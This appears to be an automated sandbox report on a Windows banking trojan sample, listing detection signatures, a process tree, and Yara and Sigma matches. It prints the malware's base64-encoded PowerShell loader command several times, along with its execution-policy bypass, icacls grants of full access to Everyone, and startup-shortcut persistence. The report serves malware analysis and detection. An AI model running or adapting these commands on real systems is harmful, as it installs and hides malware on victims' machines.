Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RcFBMph6zu.exe

Overview

General Information

Sample name:RcFBMph6zu.exe
renamed because original name is a hash value
Original sample name:7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab.exe
Analysis ID:1578840
MD5:6b5c558a9c8728fdd47e7d8c20cab5ff
SHA1:2e3761639e85fe8143620d04f0f03e5b30207de4
SHA256:7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab
Tags:bankerexelatamPAGAMENTOS-DIGITAIS-LTDAtrojanuser-johnk3r
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:48
Range:0 - 100

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • RcFBMph6zu.exe (PID: 3136 cmdline: "C:\Users\user\Desktop\RcFBMph6zu.exe" MD5: 6B5C558A9C8728FDD47E7D8C20CAB5FF)
    • powershell.exe (PID: 7108 cmdline: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 936 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • WmiPrvSE.exe (PID: 6724 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • icacls.exe (PID: 4776 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • Nvidia-48001.exe (PID: 4256 cmdline: "C:\Nvidia-48001\Nvidia-48001.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • svchost.exe (PID: 1364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Nvidia-48001.exe (PID: 2032 cmdline: "C:\Nvidia-48001\Nvidia-48001.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7108INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x1add1:$b2: ::FromBase64String(
  • 0x1ae25:$b2: ::FromBase64String(
  • 0x259cf3:$b2: ::FromBase64String(
  • 0x25a215:$b2: ::FromBase64String(
  • 0x25a56c:$b2: ::FromBase64String(
  • 0x25aa7a:$b2: ::FromBase64String(
  • 0x25abce:$b2: ::FromBase64String(
  • 0x25af95:$b2: ::FromBase64String(
  • 0x25b0a0:$b2: ::FromBase64String(
  • 0x25b923:$b2: ::FromBase64String(
  • 0x25bb42:$b2: ::FromBase64String(
  • 0x25c260:$b2: ::FromBase64String(
  • 0x2e0972:$b2: ::FromBase64String(
  • 0x2e0cd9:$b2: ::FromBase64String(
  • 0x2e0fbc:$b2: ::FromBase64String(
  • 0x2e13c1:$b2: ::FromBase64String(
  • 0x2e1516:$b2: ::FromBase64String(
  • 0x2e18de:$b2: ::FromBase64String(
  • 0x2e19ea:$b2: ::FromBase64String(
  • 0x2e204e:$b2: ::FromBase64String(
  • 0x2e226e:$b2: ::FromBase64String(
SourceRuleDescriptionAuthorStrings
amsi64_7108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x308:$b2: ::FromBase64String(
  • 0x40b:$b2: ::FromBase64String(
  • 0x53a:$b2: ::FromBase64String(
  • 0x664:$b2: ::FromBase64String(
  • 0x78f:$b2: ::FromBase64String(
  • 0x87e:$b2: ::FromBase64String(
  • 0x9b1:$b2: ::FromBase64String(
  • 0xa44:$b2: ::FromBase64String(
  • 0xb6f:$b2: ::FromBase64String(
  • 0xce7:$b2: ::FromBase64String(
  • 0xe5c:$b2: ::FromBase64String(
  • 0x1111:$b2: ::FromBase64String(
  • 0x131c:$b2: ::FromBase64String(
  • 0x1534:$b2: ::FromBase64String(
  • 0x1709:$b2: ::FromBase64String(
  • 0x188a:$b2: ::FromBase64String(
  • 0x1983:$b2: ::FromBase64String(
  • 0x19d7:$b2: ::FromBase64String(
  • 0x1bed:$b2: ::FromBase64String(
  • 0x1d48:$b2: ::FromBase64String(
  • 0x2088:$b2: ::FromBase64String(

System Summary

barindex
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7108, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-48001.lnk
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZw
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZw
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZw
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7108, TargetFilename: C:\Nvidia-48001\play.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7108, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-48001.lnk
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand 